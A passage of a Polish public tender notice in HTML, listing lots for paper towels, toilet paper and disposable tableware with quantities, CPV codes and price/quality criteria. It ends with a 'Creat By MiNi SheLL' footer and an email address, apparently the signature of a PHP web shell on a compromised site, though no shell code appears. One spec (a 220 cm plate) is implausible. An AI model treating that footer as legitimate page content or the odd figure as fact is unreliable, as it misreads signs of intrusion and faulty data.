Kryteria oceny jakości oferowanych produktów: odporne na rozerwanie, wytrzymałe, nie sklejone..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.93.00.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. Jakość - 60</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Pakiet Nr 7 - Ręczniki i papiery toaletowe.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.	Nazwa produktu	j.m.	Szacunkowa ilość w ciągu roku
1	Ręcznik papierowy biały, miękki składany w systemie Z-Z rozmiar listka 23x25cm pakowany w paczki po 200szt,dobrze wchłaniający wodę .Karton po 4000 listków	op.	20 op.
2	Ręcznik papierowy szary składany w systemie Z-Z rozmiar listka 23x25cm pakowany w paczki po 200szt,dobrze wchłaniający wodę Karton po 4000 listków	op.	1000 op.
3	Ręcznik papierowy z makulatury nawinięty na tekturowej rolce o śr.4,5cm.Szerokość ręcznika ok. 23cm,długość.21mb	rolka	8000 rolka
4	Papier toaletowy biały, miękki  nawinięty na tekturową rolkę o średnicy 4,5cm.Szerokość papieru min.9,5cm,długość min.36m jakości porównywalnej lub równoważnej z papierem VELVET	rolka	100 rolka
5	Papier toaletowy szary z makulatury nawinięty na tekturową rolkę o średnicy 4,5cm.Szerokość papieru min.9,5cm,długość min.36m jakości porównywalnej lub równoważnej z papierem BUNNY SOFT	rolka	15000 rolka
Kryteria oceny jakości oferowanych produktów: odporne na rozerwanie, miłe w dotyku, dobrze wchłaniające wodę.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.76.10.00-2, 33.76.30.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. Jakość - 60</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Pakiet Nr 8 - Talerze i kubki jednorazowe.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.	Nazwa produktu	j.m.	Szacunkowa ilość w ciągu roku
1	Kubek plastikowy biały, jednorazowy do napojów zimnych,przeznaczony do kontaktu z żywnością, poj. 200 ml, średnica 6-8 cm, głębokość 8-10 cm. Pakowane po 100 szt w zgrzewce.	op. 100 szt.	350 op.
2	Kubek styropianowy jednorazowy do napojów gorących,przeznaczony do kontaktu z żywnością, poj. 250 ml, średnica 7-9 cm, głębokość 9-11 cm. Pakowane po 40 szt w zgrzewce.	op. 40 szt	100 op.
3	Talerz jednorazowy plastikowy niedzielony biały, przeznaczony do kontaktu z żywnością, średnica 220 cm, głębokość 2-3 cm. Pakowane po 100 szt w zgrzewce.	op. 100 szt.	200 op.
4	Flaczarka jednorazowa plastikowa biała, przeznaczona do kontaktu z żywnością, średnica 14-16 cm, głębokość 4-5 cm, poj. 500 ml. Pakowane po 100 szt w zgrzewce.	op. 100 szt.	120 op.
5	Łyżka stołowa plastikowa jednorazowa biała, przeznaczona do kontaktu z żywnością, długość 16-18 cm, Pakowane po 100 szt w zgrzewce.	op. 100 szt.	100 op.
6	Widelec stołowy plastikowy jednorazowy biały, przeznaczony do kontaktu z żywnością, długość 16-18 cm. Pakowane po 100 szt w zgrzewce.	op. 100 szt.	90 op.
7	Nóż stołowy jednorazowy, plastikowy biały, przeznaczony do kontaktu z żywnością, długość 16-18 cm. Pakowane po 100 szt w zgrzewce.	op. 100 szt.	120 op.
8	Łyżeczka do herbaty , jednorazowa plastikowa biała, przeznaczona do kontaktu z żywnością, długość 12-13 cm. Pakowane po 100 szt w zgrzewce.	op. 100 szt.	40 op.
9	Tacka papierowa o wymiarach :szerokość 14 cm, długość 20 cm, przeznaczona do kontaktu z żywnością. Pakowane po 500 szt w zgrzewce	op. 500 szt.	10 op.
10	Reklamówka jednorazowa HD o rozmiarze 25/5x45	op. 200 szt.	15 op.
11	Woreczki foliowe HDPE o rozmiarze 14/4x32	op. 1000 szt.	10 op.


Kryteria oceny jakości oferowanych produktów: łatwe w użyciu, nie pękające w rękach lub pod wpływem ciepła..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.22.21.10-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. Jakość - 60</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com